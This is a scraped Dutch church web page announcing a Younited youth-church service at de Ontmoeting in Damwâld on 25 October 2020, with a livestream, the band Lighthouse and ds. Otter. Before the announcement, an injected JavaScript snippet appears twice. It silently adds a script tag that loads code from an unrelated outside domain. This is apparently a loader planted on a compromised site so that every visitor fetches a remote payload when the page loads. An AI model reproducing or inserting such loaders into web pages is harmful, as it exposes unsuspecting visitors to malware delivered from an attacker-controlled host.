;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kersverse YOUNITED jeugdkerk - PKN Damwâld
25 oktober 2020
19:30 t/m 21:00
de Ontmoeting
Kersverse YOUNITED jeugdkerk

Het zijn onzekere tijden, dat weten we allemaal wel. Ook met de groep van Younited hebben we het gehad over hoe we met (het organiseren van) onze diensten om moeten gaan. De laatste dienst was van 7 juni; dit was onze eerste volledig digitale dienst. Qua bereik mogen we zeker niet klagen: de teller staat inmiddels op 905! Dit betekent dat we via de digitale weg eigenlijk meer mensen hebben bereikt dan met een ‘normale’ Younited-dienst.
Al met al aanleiding om op 25 oktober weer een Younited-dienst te verzorgen! En het leuke is dat er nu ook nog op de ouderwetse manier kerkgangers bij kunnen zijn! Over de inhoud van de dienst kunnen we nog niks zeggen, want op het moment van schrijven moeten we de eerste (digitale) vergadering nog hebben. Wel kunnen we alvast verklappen dat de band Lighthouse de muzikale begeleiding gaat verzorgen. Samen met ds. Otter voor het verdiepende praatje hebben we een sterke bezetting!
Zet het vast in je agenda: zondag 25 oktober om 19.30u een kersverse Younited-dienst. Te volgen live in de kerk, en via de stream vanaf 19.15u.

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld